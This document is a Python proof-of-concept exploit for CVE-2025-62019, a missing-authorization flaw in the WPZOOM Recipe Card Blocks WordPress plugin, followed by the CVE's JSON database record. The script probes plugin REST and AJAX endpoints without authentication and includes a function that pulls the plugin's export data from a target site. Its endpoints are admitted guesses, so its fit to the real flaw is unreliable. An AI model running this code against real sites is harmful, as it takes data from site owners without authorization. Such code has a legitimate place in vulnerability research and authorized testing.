CVE-2025-62019

# CVE-2025-62019 PoC - Missing Authorization in Recipe Card Blocks # WordPress Plugin: recipe-card-blocks-by-wpzoom <= 3.4.8 # Vulnerability: Missing Authorization / Broken Access Control import requests import sys # Target WordPress site TARGET_URL = "http://target-wordpress-site.com" # Plugin REST API endpoint (example - adjust based on actual endpoint) API_ENDPOINTS = [ "/wp-json/recipe-card/v1/settings", "/wp-json/recipe-card/v1/recipes", "/wp-json/recipe-card/v1/export", "/wp-admin/admin-ajax.php?action=get_recipe_data" ] def check_vulnerability(): """Check if the target is vulnerable to CVE-2025-62019""" print(f"[*] Testing CVE-2025-62019 - Missing Authorization in Recipe Card Blocks") print(f"[*] Target: {TARGET_URL}") print("-" * 60) vulnerable = False for endpoint in API_ENDPOINTS: url = f"{TARGET_URL}{endpoint}" print(f"\n[+] Testing endpoint: {endpoint}") try: # Try without authentication (unauthorized request) response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: print(f"[!] VULNERABLE: Endpoint returned 200 OK without authentication") print(f"[+] Response preview: {response.text[:200]}...") vulnerable = True elif response.status_code == 401 or response.status_code == 403: print(f"[+] Protected: Endpoint requires authentication (HTTP {response.status_code})") else: print(f"[*] Response: HTTP {response.status_code}") except requests.RequestException as e: print(f"[-] Error testing endpoint: {e}") print("\n" + "=" * 60) if vulnerable: print("[!] TARGET IS VULNERABLE to CVE-2025-62019") print("[!] Recommendation: Update Recipe Card Blocks to version > 3.4.8") else: print("[+] Target appears to be patched or endpoint not found") return vulnerable def exploit_data_exfiltration(): """Attempt to exfiltrate recipe data (for authorized testing only)""" print("\n[*] Attempting data exfiltration (authorized testing only)...") # This would attempt to extract sensitive recipe data # Only use on systems you have permission to test export_url = f"{TARGET_URL}/wp-json/recipe-card/v1/export" try: response = requests.get(export_url, timeout=10) if response.status_code == 200: print("[!] Successfully retrieved recipe data without authentication") return response.json() except Exception as e: print(f"[-] Exfiltration failed: {e}") return None if __name__ == "__main__": # Suppress SSL warnings for testing requests.packages.urllib3.disable_warnings() if len(sys.argv) > 1: TARGET_URL = sys.argv[1] check_vulnerability()

{"cve": {"id": "CVE-2025-62019", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:16:03.163", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WPZOOM Recipe Card Blocks for Gutenberg & Elementor recipe-card-blocks-by-wpzoom.This issue affects Recipe Card Blocks for Gutenberg & Elementor: from n/a through <= 3.4.8."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/recipe-card-blocks-by-wpzoom/vulnerability/wordpress-recipe-card-blocks-for-gutenberg-elementor-plugin-3-4-8-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}